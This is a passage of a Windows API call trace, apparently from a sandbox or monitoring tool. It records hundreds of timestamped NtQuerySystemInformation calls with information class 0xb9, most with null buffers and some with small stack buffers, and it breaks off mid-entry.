NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x38, ResultLength=0x0) [0178.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x28, ResultLength=0x0) [0178.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff298, Length=0x50, ResultLength=0x0) [0178.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x38, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff060, Length=0x28, ResultLength=0x0) [0178.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x38, ResultLength=0x0) [0178.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x28, ResultLength=0x0) [0178.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x28, ResultLength=0x0) [0178.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x38, ResultLength=0x0) [0178.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff040, Length=0x20, ResultLength=0x0) [0178.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefc0, Length=0x20, ResultLength=0x0) [0178.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefc0, Length=0x20, ResultLength=0x0) [0178.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefc0, Length=0x20, ResultLength=0x0) [0178.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x38, ResultLength=0x0) [0178.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff040, Length=0x20, ResultLength=0x0) [0178.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefd0, Length=0x20, ResultLength=0x0) [0178.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefd0, Length=0x20, ResultLength=0x0) [0178.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff298, Length=0x50, ResultLength=0x0) [0178.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x38, ResultLength=0x0) [0178.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0178.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0178.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0178.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feff0, Length=0x28, ResultLength=0x0) [0178.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff060, Length=0x28, ResultLength=0x0) [0178.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x38, ResultLength=0x0) [0178.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x28, ResultLength=0x0) [0178.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x28, ResultLength=0x0) [0178.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x38, ResultLength=0x0) [0178.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff040, Length=0x20, ResultLength=0x0) [0178.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefc0, Length=0x20, ResultLength=0x0) [0178.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefc0, Length=0x20, ResultLength=0x0) [0178.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefc0, Length=0x20, ResultLength=0x0) [0178.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1c0, Length=0x38, ResultLength=0x0) [0178.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff040, Length=0x20, ResultLength=0x0) [0178.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefd0, Length=0x20, ResultLength=0x0) [0178.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefd0, Length=0x20, ResultLength=0x0) [0178.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x30, ResultLength=0x0) [0178.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1b0, Length=0x38, ResultLength=0x0) [0178.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff110, Length=0x30, ResultLength=0x0) [0178.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff380, Length=0x28, ResultLength=0x0) [0178.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff210, Length=0x20, ResultLength=0x0) [0178.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff4a0, Length=0x28, ResultLength=0x0) [0178.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff4a0, Length=0x28, ResultLength=0x0) [0178.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff4a0, Length=0x28, ResultLength=0x0) [0178.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3c0, Length=0x28, ResultLength=0x0) [0178.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3c0, Length=0x28, ResultLength=0x0) [0178.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3c0, Length=0x28, ResultLength=0x0) [0178.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff330, Length=0x20, ResultLength=0x0) [0178.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff3c0, Length=0x28, ResultLength=0x0) [0178.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0178.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, 